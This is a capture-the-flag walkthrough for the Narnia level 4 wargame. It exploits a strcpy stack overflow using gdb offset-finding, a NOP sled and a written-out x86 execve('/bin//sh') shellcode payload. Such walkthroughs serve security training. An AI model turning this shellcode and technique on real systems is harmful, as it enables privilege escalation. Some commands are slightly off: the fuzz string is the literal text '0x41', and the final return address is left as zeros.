Buffer Overflow again - Brute Forcing your way in!
This article is about how a bigger buffer can be overflowed and a return address be given so as to get administrative privileges. The method is hugely similar to this post here. Lets jump straight into practice! SSH into narnia4 with password obtained from here.
- Snap of /narnia/narnia4.c
- What is the vulnerability?
String copy of commandline argument into buffer variable is done.
strcpy(buffer, argv[1]);
Buffer overflow of the variable buffer and return address of main should be done and NOP sled can be used to overwrite return address to some address within the buffer to execute our shell-code payload.
- Go to /narnia folder. Enter gdb ./narnia4 and disassemble the main function with "(gdb)disas main" Snap:
- You can see the line "sub $0x104 %esp" line which adds 260 bytes to stack pointer.
- Run gdb --args ./narnia4 $(python -c 'print "0x41"*260' ) and do "(gdb) run"and slowly increase from 260 till the return address for segmentation fault is overwritten with ""\x41\x41\x41\x41". I reached this point at 268
- So taking payload as same previous shell-code used in Narnia Level 2, 34 bytes + return address 4 bytes leaves 230 bytes for NOP. Sending this as argument through GDB to choose appropriate return address
- In above snap, choosing return address as 0xffffd801. Now run the program narnia4 with this return address. Snap:
- Shell is opened with elevated privileges of narnia5 as can be seen above and you can cat the password for Level 5!
gdb --args /narnia/narnia4 $(python -c 'print "\x90"*230+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x00\x00\x00\x00"')
(gdb) run
(gdb) x/250x $esp
(gdb) quit
Snap:
